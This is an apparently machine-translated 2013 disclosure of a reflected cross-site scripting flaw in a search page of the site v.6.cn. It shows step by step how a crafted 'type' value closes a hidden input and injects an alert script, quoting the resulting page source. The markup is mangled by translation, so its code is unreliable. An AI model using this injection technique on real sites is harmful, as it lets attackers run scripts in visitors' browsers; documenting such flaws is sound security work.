Author: H3art
Data: Jan 16,2013
Vulnerability page: http://v.6.cn/search.php? Key & type =
Now you can enter either of the following types, and then view the source code.
Http://v.6.cn/search.php? Key & type = xss
<A rel = "nofollow" id = "itoPlay" target = "_ blank" class = "toPlay" href = "http://v.6.cn/logins.php"> Start live broadcast </a> <div class =" search "> <form name =" search "method =" get "action =" http://v.6.cn/search.php "onsubmit =" return searchBox. submit (this) "> <input type =" hidden "name =" type "autocomplete =" off "value =" xss "id =" input_type "/> <div class =" searchBox "> <span class = "soInput"> <input type = "text" name = "key" value = ""/> </span> <div id = "so_option" class = "soOption "onclick =" searchBox. setOption () "> <a class =" soType "> <span id =" so_type "> User </span> <em> </a> <div class =" soTypeList ">
Analyze data from <input type = "hidden" name = "type" autocomplete = "off" value = "xss" id = "input_type"/>. And this xss is the value we just entered. It can be seen that value controls user input. Next we enter xss "> to close the preceding input.
<A rel = "nofollow" id = "itoPlay" target = "_ blank" class = "toPlay" href = "http://v.6.cn/logins.php"> Start live broadcast </a> <div class =" search "> <form name =" search "method =" get "action =" http://v.6.cn/search.php "onsubmit =" return searchBox. submit (this) "> <input type =" hidden "name =" type "autocomplete =" off "value =" xss ">" id = "input_type"/> <div class = "searchBox"> <span class = "soInput"> <input type = "text" name = "key" value = ""/> </span> <div id = "so_option" class = "soOption" onclick = "searchBox. setOption () "> <a class =" soType "> <span id =" so_type "> User </span> <em> </a> <div class =" soTypeList ">
You can see that the "id =" input_type "/> after you close it is displayed on the page.
We enter xss "> <script> alert (" xss by H3art ") </script>
Analyze the source code <a rel = "nofollow" id = "itoPlay" target = "_ blank" class = "toPlay" href = "http://v.6.cn/logins.php"> Start live broadcast </a> <div class = "search" & gt; <form name = "search" method = "get" action = "http://v.6.cn/search.php" onsubmit = "return searchBox. submit (this) "> <input type =" hidden "name =" type "autocomplete =" off "value =" xss "> <script> alert (" xss by H3art ") </script> "id =" input_type "/> <div class =" searchBox "> <span class =" soInput "> <input type =" text "name =" key" value = ""/> </span> <div id = "so_option" class = "soOption" onclick = "searchBox. setOption () "> <a class =" soType "> <span id =" so_type "> User </span> <em> </a> <div class =" soTypeList ">
Then enter xss "> <script> alert (" xss by H3art ") </script> <input type =" xss "name =" xss
<A rel = "nofollow" id = "itoPlay" target = "_ blank" class = "toPlay" href = "http://v.6.cn/logins.php"> Start live broadcast </a> <div class =" search "> <form name =" search "method =" get "action =" http://v.6.cn/search.php "onsubmit =" return searchBox. submit (this) "> <input type =" hidden "name =" type "autocomplete =" off "value =" xss "> <script> alert (" xss by H3art ") </script> <input type = "xss" name = "xss" id = "input_type"/> <div class = "searchB Ox "> <span class =" soInput "> this vulnerability is similar to the xss vulnerability reported by Tudou some time ago ..